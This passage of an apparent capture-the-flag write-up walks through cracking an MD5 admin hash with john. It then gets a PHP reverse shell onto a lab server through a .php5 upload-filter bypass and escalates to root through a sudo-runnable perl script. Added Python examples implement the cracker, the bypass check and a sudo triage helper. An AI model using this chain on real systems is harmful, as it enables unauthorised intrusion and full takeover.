Now we can run john against the hash with the rockyou wordlist to recover the password. The hash is unsalted MD5 (john's Raw-MD5 format), so every wordlist entry costs a single cheap digest and the run finishes almost immediately.
$ john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 SSE2 4x3])
Warning: no OpenMP support for this hash type, consider --fork=3
Press 'q' or Ctrl-C to abort, almost any other key for status
Password123 (?)
1g 0:00:00:00 DONE (2023-12-12 09:57) 3.448g/s 115862p/s 115862c/s 115862C/s coco21..181193
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
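The dictionary attack john performs above, written out as an added Python example (not part of the original writeup). The page does not reproduce hash.txt, so the target hash is constructed here from the cracked value, and the short WORDLIST stands in for rockyou.txt.

```python
import hashlib
from typing import Iterable, Optional

# Constructed target: the page does not reproduce hash.txt, so we derive an
# unsalted MD5 from the cracked value purely to exercise the attack.
TARGET_HASH = hashlib.md5(b"Password123").hexdigest()

# A few-line stand-in for rockyou.txt, constructed for this example.
WORDLIST = ["123456", "password", "coco21", "181193", "Password123", "letmein"]


def crack_raw_md5(target_hex: str, candidates: Iterable[str]) -> Optional[str]:
    """Dictionary attack against an unsalted ("Raw-") MD5 hash.

    With no salt and no work factor, every candidate costs exactly one cheap
    digest that is compared directly against the target, which is why john
    reports over 100k candidates per second on a single core above.
    """
    target = target_hex.strip().lower()
    for word in candidates:
        # surrogateescape round-trips raw bytes from wordlists that are not valid UTF-8
        if hashlib.md5(word.encode("utf-8", "surrogateescape")).hexdigest() == target:
            return word
    return None


def crack_from_file(target_hex: str, wordlist_path: str) -> Optional[str]:
    """Same attack, streamed line by line from a wordlist file such as rockyou.txt."""
    with open(wordlist_path, encoding="utf-8", errors="surrogateescape") as fh:
        return crack_raw_md5(target_hex, (line.rstrip("\r\n") for line in fh))


if __name__ == "__main__":
    print(crack_raw_md5(TARGET_HASH, WORDLIST))  # Password123
```

The same loop is all a cracker needs for any unsalted fast hash; a salted, slow hash (bcrypt, scrypt, Argon2) would force one expensive computation per candidate per user, which is the property the application here lacked.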
If we browse to the /content/as page we find a login form, which we can log in to with the following credentials:
Now that we are in the admin panel, we can start looking for a way to get code execution on the server.
We can generate a PHP reverse shell, pointing at our own IP and listening port, from the Revshells page.
Once it is saved to a file, we can upload it through the Media Center of the admin panel, giving it a .php5 extension rather than .php: the upload check lets .php5 through, while the web server still hands .php5 files to the PHP interpreter.
Next, we set up a nc listener on the port we put in the shell.
$ nc -nlvp 9999
listening on [any] 9999 ...
Then we request our uploaded file under /content/attachment/ so that the server executes it.
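Why a .php5 name gets past the Media Center when .php does not, as an added Python example (not code from the page or from the CMS): a block-list extension check beside an allow-list one, both tested against the extensions the classic Debian/Ubuntu php5 Apache configuration hands to mod_php. BLOCKED and CANDIDATES are constructed assumptions, since the page does not show the real upload filter.

```python
import os
import re
from typing import Callable, List

# Extensions the weak filter rejects. Constructed for this example; the page
# does not show the CMS's real filter, only that a .php5 upload got through.
BLOCKED = {".php", ".phtml"}

# Allow-list for a media library: what an image/document upload may ever be.
ALLOWED = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}

# The classic Debian/Ubuntu php5 Apache config hands all of these to mod_php:
#   <FilesMatch ".+\.ph(p[345]?|t|tml)$">  SetHandler application/x-httpd-php
PHP_HANDLER_RE = re.compile(r"\.ph(?:p[345]?|t|tml)$", re.IGNORECASE)

# Names an attacker might try; constructed for this example.
CANDIDATES = ["shell.php", "shell.php5", "shell.phtml", "shell.pht",
              "shell.PhP3", "logo.png", "shell.php.jpg"]


def executed_as_php(filename: str) -> bool:
    """Would Apache (with the FilesMatch above) run this upload as PHP?"""
    return PHP_HANDLER_RE.search(filename) is not None


def blocklist_upload_ok(filename: str) -> bool:
    """Vulnerable: rejects only the extensions the developer thought of."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in BLOCKED


def allowlist_upload_ok(filename: str) -> bool:
    """Hardened: accept only known media extensions, reject everything else."""
    ext = os.path.splitext(filename)[1].lower()
    return ext in ALLOWED


def bypasses(check: Callable[[str], bool], names: List[str] = CANDIDATES) -> List[str]:
    """Filenames the upload check accepts that the server would still execute as PHP."""
    return [n for n in names if check(n) and executed_as_php(n)]


if __name__ == "__main__":
    print("block-list lets through:", bypasses(blocklist_upload_ok))
    print("allow-list lets through:", bypasses(allowlist_upload_ok))
```

An allow-list fixes only the name check. The upload directory should also refuse to execute scripts (for example by storing uploads outside the web root or disabling the PHP engine for that directory), and note that when Apache maps PHP with AddHandler instead of an anchored FilesMatch, every extension in a name is considered, so shell.php.jpg would run as PHP too.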
Let's check our listener.
$ nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.17.48.138] from (UNKNOWN) [10.10.37.233] 60656
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
07:02:32 up 1:22, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Let's check which commands www-data may run through sudo, using sudo -l.
$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on THM-Chal:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
So we can run the backup.pl script as root through perl without a password. Let's check what the script does.
So it establishes a reverse shell to 192.168.0.190 on port 5554. Since we can edit that command, we replace the IP and port with those of our own listener; because sudo runs the script as root, the shell that connects back to us will be a root shell.
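A small triage helper for the sudo -l step above, added here as an example and not part of the writeup. It parses each rule into run-as user, tags and argv, then reports which file arguments a www-data-like user could modify, because an interpreter run as root via NOPASSWD executes whatever the script it is handed contains. The sudo -l text is the one from the page; demo() constructs the scenario in a temporary directory (a non-writable interpreter stub plus a world-writable script), and the uid/gid 33 values come from the id output above.

```python
import os
import re
import stat
import tempfile
from typing import List, Set, Tuple

# The sudo -l output from the page, embedded here as sample input.
SUDO_L_OUTPUT = """\
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
"""

# A command rule looks like "(runas) TAG: TAG: /path/to/cmd args...".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>/\S.*)$")


def parse_sudo_rules(output: str) -> List[Tuple[str, List[str], List[str]]]:
    """Return (runas, tags, argv) for every command rule in `sudo -l` output."""
    rules = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if m:
            tags = [t.rstrip(":") for t in m.group("tags").split()]
            rules.append((m.group("runas"), tags, m.group("cmd").split()))
    return rules


def writable_by(path: str, uid: int, gids: Set[int]) -> bool:
    """Can a user with this uid and these gids modify the file at `path`?

    Mode bits are read from the file rather than via os.access so the answer
    describes the *target* user (www-data), not whoever runs this script.
    Like the kernel, only one class of bits applies: owner, else group, else other.
    """
    st = os.stat(path)
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def writable_sudo_targets(output: str, uid: int, gids: Set[int]) -> List[Tuple[str, str]]:
    """(rule command, writable path) for each argument of a root-capable rule
    that names an existing file the user could modify.

    The interesting case is an interpreter (perl, python, sh) pointed at a
    script: the interpreter is root-owned, but if the script, or anything it in
    turn executes, is writable, its contents run as root.
    """
    findings = []
    for runas, _tags, argv in parse_sudo_rules(output):
        if "ALL" not in runas and "root" not in runas:
            continue  # cannot reach root through this rule
        for arg in argv:
            if arg.startswith("/") and os.path.isfile(arg) and writable_by(arg, uid, gids):
                findings.append((" ".join(argv), arg))
    return findings


def demo() -> List[Tuple[str, str]]:
    """Constructed scenario: a 0755 interpreter stub and a 0777 script in a temp
    directory, checked as www-data (uid 33, gid 33). The files belong to whoever
    runs this, so only the group/other bits decide, as for www-data on the target."""
    d = tempfile.mkdtemp()
    perl, script = os.path.join(d, "perl"), os.path.join(d, "backup.pl")
    for path, mode in ((perl, 0o755), (script, 0o777)):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    sudo_l = (f"User www-data may run the following commands on THM-Chal:\n"
              f"    (ALL) NOPASSWD: {perl} {script}\n")
    return writable_sudo_targets(sudo_l, uid=33, gids={33})


if __name__ == "__main__":
    print(parse_sudo_rules(SUDO_L_OUTPUT))
    print(demo())
```

On a real target you would run writable_sudo_targets against the live sudo -l output and then read each flagged script for further files it sources or executes, since the writable file is often one step removed from the path named in sudoers; the fix is to make every file on that chain root-owned and 0644 or tighter, or to drop the NOPASSWD rule entirely.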